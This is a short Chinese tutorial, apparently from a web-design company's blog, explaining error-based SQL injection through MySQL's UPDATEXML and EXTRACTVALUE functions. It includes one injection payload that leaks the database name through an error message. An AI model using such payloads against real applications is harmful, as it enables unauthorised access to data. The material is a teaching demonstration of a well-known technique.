顯錯(cuò)注入updatexml和extractvalue的示例分析，相信很多沒(méi)有經(jīng)驗(yàn)的人對(duì)此束手無(wú)策，為此本文總結(jié)了問(wèn)題出現(xiàn)的原因和解決方法，通過(guò)這篇文章希望你能解決這個(gè)問(wèn)題。

創(chuàng)新互聯(lián)建站是一家專注于成都網(wǎng)站制作、成都網(wǎng)站設(shè)計(jì)與策劃設(shè)計(jì),永寧網(wǎng)站建設(shè)哪家好?創(chuàng)新互聯(lián)建站做網(wǎng)站,專注于網(wǎng)站建設(shè)十余年,網(wǎng)設(shè)計(jì)領(lǐng)域的專業(yè)建站公司;建站業(yè)務(wù)涵蓋:永寧等地區(qū)。永寧做網(wǎng)站價(jià)格咨詢:028-86922220

首先介紹兩個(gè)函數(shù)

UPDATEXML (XML_document, XPath_string, new_value); 

第一個(gè)參數(shù)：XML_document是String格式，為XML文檔對(duì)象的名稱，文中為Doc 

第二個(gè)參數(shù)：XPath_string (Xpath格式的字符串) ，如果不了解Xpath語(yǔ)法，可以在網(wǎng)上查找教程。 

第三個(gè)參數(shù)：new_value，String格式，替換查找到的符合條件的數(shù)據(jù) 

EXTRACTVALUE (XML_document, XPath_string); 

第一個(gè)參數(shù)：XML_document是String格式，為XML文檔對(duì)象的名稱，文中為Doc 

第二個(gè)參數(shù)：XPath_string (Xpath格式的字符串)

一、查詢數(shù)據(jù)庫(kù)名稱

show databases;

二、選擇數(shù)據(jù)庫(kù)security

use security;

三、顯示數(shù)據(jù)庫(kù)中的表

show tables;

五、用函數(shù)updatexml注入，獲取數(shù)據(jù)庫(kù)名稱

MySQL> select * from users where id=1 and updatexml(2,concat(0x3D,database(),0x3

D),2);

看完上述內(nèi)容，你們掌握 顯錯(cuò)注入updatexml和extractvalue的示例分析的方法了嗎？如果還想學(xué)到更多技能或想了解更多相關(guān)內(nèi)容，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！